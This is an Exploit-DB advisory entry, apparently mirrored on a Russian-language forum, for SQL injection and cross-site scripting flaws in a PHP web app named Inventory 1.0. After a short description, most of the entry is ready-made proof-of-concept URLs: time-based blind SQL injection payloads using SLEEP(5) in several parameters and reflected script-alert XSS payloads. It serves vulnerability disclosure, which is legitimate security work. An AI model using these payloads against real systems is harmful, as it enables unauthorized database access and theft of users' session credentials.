- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 37974
- Проверка EDB
-
- Пройдено
- Автор
- G13
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2012-10-26
Inventory - Multiple Cross-Site Scripting / SQL Injections
Код:
source: https://www.securityfocus.com/bid/56293/info
Inventory is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Inventory 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/inventory/consulta_fact.php?fact_num=17 AND SLEEP(5)
http://www.example.com/inventory/[email protected]'AND SLEEP(5) AND 'EJxe'='EJxe&sn=555-555- [email protected]' AND SLEEP(5) AND 'IgkP'='IgkP&[email protected]' AND SLEEP(5) AND 'CFdY'='CFdY
http://www.example.com/inventory/newtransact.php?ref=RSC-280' AND SLEEP(5) AND 'wIUB'='wIUB
http://www.example.com/inventory/consulta_fact.php?fact_num=<script>alert(1)</script>
http://www.example.com/inventory/newinventario.php?sn=<script>alert(100)</script>
http://www.example.com/inventory/newtransact.php?ref=<script>alert(100)</script>
- Источник
- www.exploit-db.com